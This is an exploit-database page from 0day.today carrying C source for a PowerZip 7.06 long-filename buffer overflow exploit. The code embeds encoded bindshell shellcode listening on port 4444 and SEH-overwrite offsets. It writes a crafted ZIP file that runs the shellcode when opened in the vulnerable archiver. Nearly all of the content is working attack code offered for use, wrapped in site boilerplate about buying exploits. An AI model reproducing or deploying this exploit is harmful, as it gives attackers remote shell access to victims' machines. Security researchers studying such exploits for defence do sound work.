0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
PowerZip <= 7.06.3895 Long Filename Handling Buffer Overflow Exploit
==================================================================== PowerZip <= 7.06.3895 Long Filename Handling Buffer Overflow Exploit ==================================================================== /* PowerZip 7.06 Exploit by bratax (http://www.bratax.be/) Just a quick one as I was able to reuse most of my zipcentral eploit code.. Greetz to everyone I like...(special greetz to mobbie and DT as they were sad I didn't mention them the previous time :p) ****************************** Some technical info: - Original advisory + vulnerability details are available here: http://vuln.sg/powerzip706-en.html (I didn't notice anything like DEP tho?) - some code might look weird in this source.. (e.g. shellcode, offsets,...) this is because a lot of values are changed in memory.. so use your favorite debugger to see the real values and codes - tested on XP Pro English (SP2) and XP Home Dutch (SP2) !! sometimes it works, sometimes it doesn't... (throws exception E06D7363 when it doesn't)... just try over and over and over..... and over.... and over... and over again till it works.. :p sometimes it works 10 times in a row and sometimes you have to try 10 times before it works 1 time.. I'm going to investigate this weekend why this is happening.. but now it's time to relax and drink some beers :) */ #include <stdio.h> #include <string.h> unsigned char scode[]= //bindshell on p4444 (thx metasploit) "\x89\x03\x59\x89\x05\x8a\x9b\x98\x98\x98\x4f\x49\x49\x49\x49\x49" "\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36" "\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34" "\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41" "\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4c\x36\x4b\x4e" "\x4d\x54\x4a\x4e\x49\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x42\x36\x4b\x38" "\x4e\x46\x46\x42\x46\x42\x4b\x58\x45\x44\x4e\x43\x4b\x38\x4e\x37" "\x45\x30\x4a\x57\x41\x50\x4f\x4e\x4b\x48\x4f\x34\x4a\x51\x4b\x38" "\x4f\x45\x42\x32\x41\x30\x4b\x4e\x49\x44\x4b\x38\x46\x43\x4b\x58" "\x41\x50\x50\x4e\x41\x43\x42\x4c\x49\x59\x4e\x4a\x46\x58\x42\x4c" "\x46\x37\x47\x30\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e" "\x46\x4f\x4b\x33\x46\x35\x46\x32\x4a\x52\x45\x57\x45\x4e\x4b\x48" "\x4f\x35\x46\x42\x41\x30\x4b\x4e\x48\x36\x4b\x58\x4e\x50\x4b\x54" "\x4b\x48\x4f\x35\x4e\x41\x41\x30\x4b\x4e\x43\x30\x4e\x52\x4b\x58" "\x49\x48\x4e\x56\x46\x32\x4e\x31\x41\x36\x43\x4c\x41\x43\x4b\x4d" "\x46\x56\x4b\x48\x43\x44\x42\x53\x4b\x48\x42\x44\x4e\x50\x4b\x38" "\x42\x37\x4e\x41\x4d\x4a\x4b\x48\x42\x44\x4a\x30\x50\x45\x4a\x36" "\x50\x38\x50\x44\x50\x30\x4e\x4e\x42\x35\x4f\x4f\x48\x4d\x48\x46" "\x43\x45\x48\x56\x4a\x46\x43\x43\x44\x33\x4a\x56\x47\x37\x43\x37" "\x44\x43\x4f\x55\x46\x45\x4f\x4f\x42\x4d\x4a\x36\x4b\x4c\x4d\x4e" "\x4e\x4f\x4b\x33\x42\x55\x4f\x4f\x48\x4d\x4f\x45\x49\x58\x45\x4e" "\x48\x56\x41\x48\x4d\x4e\x4a\x50\x44\x30\x45\x35\x4c\x36\x44\x50" "\x4f\x4f\x42\x4d\x4a\x36\x49\x4d\x49\x50\x45\x4f\x4d\x4a\x47\x45" "\x4f\x4f\x48\x4d\x43\x55\x43\x45\x43\x35\x43\x35\x43\x35\x43\x54" "\x43\x55\x43\x54\x43\x35\x4f\x4f\x42\x4d\x48\x46\x4a\x56\x41\x41" "\x4e\x45\x48\x56\x43\x45\x49\x48\x41\x4e\x45\x59\x4a\x46\x46\x4a" "\x4c\x31\x42\x57\x47\x4c\x47\x55\x4f\x4f\x48\x4d\x4c\x36\x42\x41" "\x41\x35\x45\x45\x4f\x4f\x42\x4d\x4a\x56\x46\x4a\x4d\x4a\x50\x32" "\x49\x4e\x47\x35\x4f\x4f\x48\x4d\x43\x55\x45\x45\x4f\x4f\x42\x4d" "\x4a\x56\x45\x4e\x49\x54\x48\x58\x49\x44\x47\x45\x4f\x4f\x48\x4d" "\x42\x35\x46\x55\x46\x55\x45\x55\x4f\x4f\x42\x4d\x43\x39\x4a\x36" "\x47\x4e\x49\x47\x48\x4c\x49\x57\x47\x45\x4f\x4f\x48\x4d\x45\x55" "\x4f\x4f\x42\x4d\x48\x46\x4c\x56\x46\x36\x48\x36\x4a\x56\x43\x46" "\x4d\x36\x49\x48\x45\x4e\x4c\x46\x42\x45\x49\x35\x49\x32\x4e\x4c" "\x49\x38\x47\x4e\x4c\x56\x46\x34\x49\x58\x44\x4e\x41\x43\x42\x4c" "\x43\x4f\x4c\x4a\x50\x4f\x44\x54\x4d\x32\x50\x4f\x44\x34\x4e\x52" "\x43\x39\x4d\x38\x4c\x37\x4a\x33\x4b\x4a\x4b\x4a\x4b\x4a\x4a\x56" "\x44\x57\x50\x4f\x43\x4b\x48\x41\x4f\x4f\x45\x37\x46\x44\x4f\x4f" "\x48\x4d\x4b\x45\x47\x45\x44\x55\x41\x35\x41\x45\x41\x35\x4c\x36" "\x41\x30\x41\x55\x41\x45\x45\x45\x41\x45\x4f\x4f\x42\x4d\x4a\x46" "\x4d\x4a\x49\x4d\x45\x30\x50\x4c\x43\x55\x4f\x4f\x48\x4d\x4c\x36" "\x4f\x4f\x4f\x4f\x47\x43\x4f\x4f\x42\x4d\x4b\x48\x47\x45\x4e\x4f" "\x43\x58\x46\x4c\x46\x46\x4f\x4f\x48\x4d\x44\x45\x4f\x4f\x42\x4d" "\x4a\x56\x42\x4f\x4c\x48\x46\x50\x4f\x45\x43\x55\x4f\x4f\x48\x4d" "\x4f\x4f\x42\x4d\x5a"; char head[] = "\x50\x4B\x03\x04\x14\x00\x00\x00\x00\x00" "\xB7\xAC\xCE\x34\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x14\x08\x00"; char middle[] = "\x2e\x74\x78\x74\x50\x4B\x01\x02\x14\x00" "\x14\x00\x00\x00\x00\x00\xB7\xAC\xCE\x34" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x14\x08\x00\x00\x00\x00\x00\x00" "\x01\x00\x24\x00\x00\x00\x00\x00\x00"; char tail[] = "\x2e\x74\x78\x74\x50\x4B\x05\x06\x00\x00" "\x00\x00\x01\x00\x01\x00\x42\x08\x00\x00" "\x32\x08\x00\x00\x00"; int main(int argc,char *argv[]) { char overflow[2064]; // exactly 2064....... wonder why? FILE *vuln; if(argc == 1) { printf("PowerZip 7.06 Buffer Overflow Exploit.\n"); printf("Coded by bratax (http://www.bratax.be/).\n"); printf("Usage: %s <outputfile>\n",argv[0]); return 0; } vuln = fopen(argv[1],"w"); //build overflow buffer here. memset(overflow,0x32,sizeof(overflow)); //fill with crap //memcpy(overflow+787, scode, 483); memcpy(overflow+787, scode, 709); memcpy(overflow+1620, "\x41\x49\x89\x04", 4); // jmp over pop pop ret memcpy(overflow+1624, "\x02\x12\x01\x61", 4); // pop pop ret @ 0x61011202 memcpy(overflow+1628, "\x82\xFD\x81\x98\x98", 5); // jmp back to shellcode if(vuln) { //Write file fwrite(head, 1, sizeof(head), vuln); fwrite(overflow, 1, sizeof(overflow), vuln); fwrite(middle, 1, sizeof(middle), vuln); fwrite(overflow, 1, sizeof(overflow), vuln); fwrite(tail, 1, sizeof(tail), vuln); fclose(vuln); } printf("File written.\nOpen with PowerZip 7.06 to exploit.\n"); return 0; } # 0day.today [2024-12-24] #